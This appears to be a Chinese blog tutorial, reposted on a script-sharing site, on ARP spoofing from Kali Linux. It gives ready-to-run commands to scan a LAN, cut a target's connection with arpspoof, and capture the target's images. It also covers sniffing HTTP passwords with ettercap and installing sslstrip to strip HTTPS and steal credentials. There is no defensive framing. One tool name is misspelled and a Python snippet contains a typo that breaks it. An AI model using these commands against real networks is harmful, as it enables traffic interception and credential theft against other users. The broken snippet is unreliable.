前言
很久以前的博客才發(fā)現(xiàn),發(fā)布一下。
這個系列以后有時間再做。
arp攻擊
arp路由鏈表,感興趣的自行百度,我的博客我的筆記.
路由指向
介紹兩個東西.
echo 0 >/proc/sys/net/ipv4/ip_forward #讓經(jīng)過的數(shù)據(jù)不留通
echo 1 >/proc/sys/net/ipv4/ip_forward #讓數(shù)據(jù)流通
內(nèi)網(wǎng)掃描
這個在百度上你可以看到很多相關(guān)的方式,比如nmap fping
但是基本上掃描結(jié)果不太號,在虛擬機(jī)上你會發(fā)現(xiàn)你把主機(jī)的防火墻關(guān)了都掃不到主機(jī).
這里使用netdiscover
當(dāng)然這里也寫幾個nmap之類的指令
nmap -PR -sL ip
fping -asg ip
netdiscover -i kali網(wǎng)卡 -r ip(網(wǎng)段)
netdiscover -i eth0 -r 192.168.43.1/30
掃描速度是比較慢的
斷網(wǎng)攻擊
arpspoof -i kali的網(wǎng)卡 -t 目標(biāo)地址 目標(biāo)網(wǎng)卡
arpspoof -i eth0 -t 192.168.43.7 192.168.43.1
arp欺騙信息獲取
1.arpspoof -i eth0 -t 192.168.43.7 192.168.43.1
開始欺騙讓數(shù)據(jù)經(jīng)過你的電腦
2.echo 1 >/proc/sys/net/ipv4/ip_forward
放掉數(shù)據(jù)包
獲取圖片
使用工具difinet
difinet -i eth0(網(wǎng)卡)
實際操作:
圖片會在那里臨時保存
由于網(wǎng)絡(luò)問題可能會有點卡
獲取HTTP連接的密碼信息
使用ettercap
其他的操作還是一樣的,要開啟arp欺騙
ettercap -Tq -i eth0
-T 文本模式 q 安靜模式 i 網(wǎng)卡
然后等待即可.不過現(xiàn)在都是https,作用不大
出現(xiàn)中文怎么辦,直接賦值中文亂碼,之后解碼即可
百度搜索url解碼
或者直接使用python
中文編碼
from urllib.parse import quote,unquote
str1 = '中國'
str2=quote(strl)
print(str2)
解碼
print(unquote(str2))
獲取HTTPS的密碼信息
這個要先修改以下ettercap的配置文件.
vim /etc/ettercap/etter.conf
使用工具 sslstrip
那個吐槽一下 kali 2020是沒有sslstrip的原因是沒有安裝python2的pip 只有pip3
記住一定要先安裝python2
在kali里面python 默認(rèn)為python2 當(dāng)然你可以用ln -s 修改一下.
apt install python 這個時候會自動安裝python 2.7
然后輸入以下指令安裝sslstrip
git clone https://github.com/moxie0/sslstrip.git
cd sslstrip
python setup.py install
這個是python2的,如果沒猜錯可能會遇到OpenSSL報錯說沒有這個模塊
pip install pyOpenSSL
總結(jié)
本篇文章就到這里了,希望能給你帶來幫助,也希望您能夠多多關(guān)注腳本之家的更多內(nèi)容!
您可能感興趣的文章:- kali安裝docker和portainer的配置方法
- 最新超詳細(xì)虛擬機(jī)VMware安裝Kali Linux的圖文教程
- Kali Linux安裝VMware tools安裝過程及VM安裝vmtools按鈕灰色
- VMware kali虛擬機(jī)環(huán)境配置方法
- 詳解kali linux 常用文件與指令路徑